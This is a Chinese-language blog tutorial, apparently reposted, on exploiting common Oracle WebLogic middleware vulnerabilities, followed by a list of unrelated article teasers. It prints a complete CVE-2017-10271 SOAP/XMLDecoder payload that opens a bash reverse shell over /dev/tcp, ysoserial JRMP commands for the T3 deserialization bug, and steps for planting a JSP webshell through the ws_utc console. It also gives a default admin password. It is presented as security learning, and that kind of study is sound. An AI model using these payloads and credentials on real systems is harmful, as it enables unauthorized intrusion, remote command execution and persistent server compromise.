深入浅出带你学习weblogic中间件常见漏洞

news2024/11/15 12:48:08

前文

上一篇文章给大家带来了JBOSS中间件漏洞的利用知识,不知道大家学习的如何了,今天给大家带来的是一个比较重要的中间件——weblogic漏洞利用的介绍,按我们之前的顺序,先学习一下什么是WEBLOGIC中间件。

什么是WebLogic?

WebLogic是美国Oracle公司出品的一个applicationserver,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。可以看到WEBLOGIC的作用还是非常大的,它的特点可以概括为下面五个点:

1.标准性,支持多种标准。

2.可扩展性,集群能力强。

3.开发快,可以快速部署。

4.灵活性强。

5.可靠性强,安全性高。

下面展开来讲weblogic中间件常见的漏洞以及利用方法。

XMLDecoder 反序列化漏洞

这里面包含许多可以利用的反序列化漏洞,这里就以漏洞CVE-2017-10271为例来给大家说明,学习该漏洞前需要知道SOAP是什么,可以简单说明为web服务安全性内置协议,该漏洞攻击原理就是wls组件使用了webservice来进行soap请求,攻击者构造SOAP(XML)格式的请求,在解析的过程中产生XMLDecoder反序列化漏洞,如果插入我们的恶意数据,可导致执行任意命令。下面给大家展开演示:

环境配置好后访问下面的路径判断是否存在漏洞:

wls-wsat/CoordinatorPortType 

存在以上页面则可能存在漏洞,于是我们进一步利用,我们构造POST表单如下来进行反弹shell:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
<oid>
<void index="1">
<string>-c</string>
<oid>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/ip/port 0&gt;&amp;1</string>
<oid>
</array>
<void method="start"/><oid>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope> 

之后在进行监听即可,当然也有一件检测工具,有兴趣的小伙伴可以自己去找一下哦。

Weblogic WLS Core Components 反序列化命令执行漏洞

weblogic的7001端口为控制台,如果设置为开放的话也同时会开启T3协议服务,该漏洞就是通过构造恶意的T3协议数据来进行攻击,该漏洞影响版本如下:

Oracle WebLogic Server10.3.6.0
Oracle WebLogic Server12.2.1.2
Oracle WebLogic Server12.2.1.3
Oracle WebLogic Server12.1.3.0 

我们访问端口7001得到以下页面:

同时使用nmap扫描到了存在T3协议,于是我们尝试利用此漏洞:

先使用工具启动一个JRMP Server,JRMP是一个Java远程方法协议,使用以下代码构造攻击链接:

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command] 

之后通过生成的EXP文件反弹SHELL到我们的端口:

python exp.py ip 7001 ysoserial.jar ip 114514 JRMPClient 

成功后即可进行命令执行。

Weblogic 任意文件上传漏洞

该漏洞也是利用了weblogic的7001端口的console,假设我们进入了后台,设置开启"启用Web服务测试页"选项,然后访问路径:

/ws_utc/config.do 

然后修改work home dir的路径为:

/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css 

修改的这个目录没有访问限制,之后我们回到上面文件的后台页面,进行上传JSP木马,会返回给我们一个时间戳:

于是我们通过WEBSHELL连接工具连接下面的路径:

ws_utc/css/config/keystore 

即可成功连接木马。

Weblogic 弱口令

该漏洞也是利用了上面7001端口的后台应用,该后台存在弱口令:

weblogic Oracle@123 

进入后我们就可以尝试上面的漏洞来进行GETSHELL,可以说这是一个很重要的跳板。

结语

今天讲解一下WEBLOGIC常见的中间件漏洞,多数以反序列化为主,可以看到要想好好利用还需要懂得工具的使用,有兴趣的小伙伴可以自己去搭建一个环境来进行测试,如果喜欢本文希望可以一键三连支持一下。

最后

最近找到一个VUE的文档,它将VUE的各个知识点进行了总结,整理成了《Vue 开发必须知道的36个技巧》。内容比较详实,对各个知识点的讲解也十分到位。



有需要的小伙伴,可以点击下方卡片领取,无偿分享

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/351888.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

机器学习:Recurrent Neural Network-RNN

应用举例 如果有很多词汇的时候&#xff0c;one-encode会导致很长&#xff0c;可以将不常见的归类到other&#xff0c;也可以用n-gram进行编码 输出的是一个概率分布 相同的词得到不同的结果&#xff0c;需要网络具有记忆&#xff0c;RNN网络的设计就是使得网络具有部分的记忆能…

【Python入门第十一天】Python 运算符

Python 运算符 运算符用于对变量和值执行操作。 Python 在以下组中划分运算符&#xff1a; 算术运算符赋值运算符比较运算符逻辑运算符身份运算符成员运算符位运算符 Python 算术运算符 算术运算符与数值一起使用来执行常见的数学运算&#xff1a; 运算符&#xff1a; 名…

动态网站开发讲课笔记01:网页开发基础

文章目录零、本讲学习目标一、HTML基础&#xff08;一&#xff09;HTML简介1、HTML2、HTML语言的基本格式3、<!DOCTYPE>声明4、html标签5、head标签6、body标签7、编写第一个网页8、关于编写HTML文件的工具9、HTML标签概述&#xff08;1&#xff09;单标签&#xff08;2&…

【论文笔记】图像修复Learning Joint Spatial-Temporal Transformations for Video Inpainting

论文地址&#xff1a;https://arxiv.org/abs/2007.10247 源码地址&#xff1a;GitHub - researchmm/STTN: [ECCV2020] STTN: Learning Joint Spatial-Temporal Transformations for Video Inpainting 一、项目介绍 当下SITA的方法大多采用注意模型&#xff0c;通过搜索参考帧…

webpack 开发环境的基本配置(webpack打包样式资源、html、图片、devserver、开发环境配置、以及其他资源)

A.打包样式资源 1. 创建文件 2. 下载安装 loader 包 npm i css-loader style-loader less-loader less -D 3. 修改配置文件 /*webpack.config.js webpack的配置文件作用: 指示 webpack 干哪些活&#xff08;当你运行 webpack 指令时&#xff0c;会加载里面的配置&#xff…

计算机图形学(Computer Graphics)的学习笔记

目录 1.计算机图形学是什么 2.计算机图形学学什么 3.计算机图形学应用举例 4.计算机图形学主要内容 5.图形的分类 6.图形要素 7.图形的表达方式 8.图形学应用生活中的例子 9.计算机图形学定义 10.用户界面发展方向 11.影视中的变形技术要点 12.虚拟现实的一些技术 …

Python 之 Matplotlib xticks 的再次说明、图形样式和子图

文章目录一. 改变 x 轴显示内容 xticks 方法再次说明1. x 轴是数值型数据2. 将 x 轴更改为字符串3. 总结二. 其他元素可视性1. 显示网格&#xff1a;plt.grid()2. plt.gca( ) 对坐标轴的操作三. plt.rcParams 设置画图的分辨率&#xff0c;大小等信息四. 图表的样式参数设置1. …

CUDA C++扩展的详细描述

CUDA C扩展的详细描述 文章目录CUDA C扩展的详细描述CUDA函数执行空间说明符B.1.1 \_\_global\_\_B.1.2 \_\_device\_\_B.1.3 \_\_host\_\_B.1.4 Undefined behaviorB.1.5 __noinline__ and __forceinline__B.2 Variable Memory Space SpecifiersB.2.1 \_\_device\_\_B.2.2. \_…

汽车改装避坑指南:大尾翼

今天给大家讲一个改装的误区&#xff1a;大尾翼 很多车友看到一些汽车加了大尾翼&#xff0c;非常的好看&#xff0c;就想给自己的车也加装一个。 那你有没有想过&#xff0c;尾翼这东西你真的需要吗&#xff1f; 赛车为什么加尾翼&#xff1f;尾翼主要是给车尾部的一个压低提供…

三维重建基础入门之特征点检测基础(二)

前言&#xff1a;本文着眼于记录自己从普通CVer入门三维重建的学习过程&#xff0c;可能过程比较坎坷&#xff0c;都在摸索阶段&#xff0c;但争取每次学习都能进一步&#xff0c;提高自己的能力&#xff0c;同时&#xff0c;每篇文章都会按情况相应地推出B站讲解视频&#xff…

在群晖上体验维格表社区版APITable

本文是应网友 lee yong 和 shijie880500 的要求折腾的&#xff1b; 什么是 APITable &#xff1f; APITable 是 vika 维格表的社区版&#xff0c;是一个面向 API 且易于使用的可视化数据库&#xff0c;适合所有人&#xff0c;使其成为 Airtable 的最佳开源替代品。最重要的是&a…

智慧城市总体解决方案和建设思路

“智慧城市”是综合城市发展规划、城市运行管理、城市经济社会发展、新一代信息技术应用等为一体的城市发展新模式&#xff0c;是促进城市科学发展、跨越发展、和谐发展的必然选择&#xff0c;是提升现代城市综合竞争力和国际影响力的战略制高点。 建设智慧城市&#xff0c;是城…

电脑文件被删除?试了十几款工具,数据恢复大师只看这一款

长期使用电脑办公&#xff0c;电脑肯定保存着很多数据文件。文件一多&#xff0c;我们势必是要进行整理的。要不文件太多会占用内存&#xff0c;还会影响电脑的运行速度。 整理过程中&#xff0c;重要的电脑文件被误删了怎么办&#xff1f;建议您先使用常规的方法来进行操作先…

双目客流统计方案的应用原理

双目客流统计客流摄像头采用立体视觉技术实现高度统计功能。基于视差原理。利用双镜头摄取的两幅图像的视差&#xff0c;构建三维场景&#xff0c;在检测到运动目标后。通过计算图像对应点间的位置偏差。获取目标的三维信息&#xff0c;在深度图像中对目标的检测与追踪&#xf…

Java基础二

目录 1. 常见类和对象 1.1 object 1.2 数组 Array 1.3 二维数组 1.6 二分查找法 1.7 字符串 1.8 包装类 1.9 日期类 1.10 工具类 1.11 比较 2. 异常 2.1介绍 2.2 基础语法 2.3 常见异常 3. 集合 3.1 介绍 3.2 常用的接口和类 3.3 ArrayList 基本操作 3.4 ArrayL…

165、【动态规划】leetcode ——337. 打家劫舍 III:记忆化递归+动态规划(C++版本)

题目描述 原题链接&#xff1a;337. 打家劫舍 III 解题思路 &#xff08;1&#xff09;记忆化递归 采用后序遍历的方式&#xff0c;设置一个unordered_map型Hash表record&#xff0c;记录每个结点的情况。当遍历到该节点时&#xff0c;判定之前是否遍历过&#xff0c;如果遍…

docker基本内容简单复习

文章目录一、docker简介docker镜像镜像的优化二、docker网络三、docker数据卷一、docker简介 docker是管理容器的引擎&#xff0c;docker为应用打包、部署平台&#xff0c;而非单纯的虚拟化技术 docker镜像 docker镜像是分层结构&#xff1b;共享宿主机kernel&#xff1b;同一…

【网安神器篇】——系统指纹探测工具finger

作者名&#xff1a;白昼安全主页面链接&#xff1a; 主页传送门创作初心&#xff1a; 以后赚大钱座右铭&#xff1a; 不要让时代的悲哀成为你的悲哀专研方向&#xff1a; web安全&#xff0c;后渗透技术每日鸡汤&#xff1a; 我不想停下&#xff0c;因为这次出发的感觉太好了一…

【双指针问题】977. 有序数组的平方

Halo&#xff0c;这里是Ppeua。平时主要更新C语言&#xff0c;C&#xff0c;数据结构算法......感兴趣就关注我吧&#xff01;你定不会失望。 &#x1f308;个人主页&#xff1a;主页链接 &#x1f308;算法专栏&#xff1a;专栏链接 我会一直往里填充内容哒&#xff01; &…

Python快速上手系列--日志模块--详解篇

前言本篇主要说说日志模块&#xff0c;在写自动化测试框架的时候我们就需要用到这个模块了&#xff0c;方便我们快速的定位错误&#xff0c;了解软件的运行情况&#xff0c;更加顺畅的调试程序。为什么要用到日志模块&#xff0c;直接print不就好了&#xff01;那得写多少print…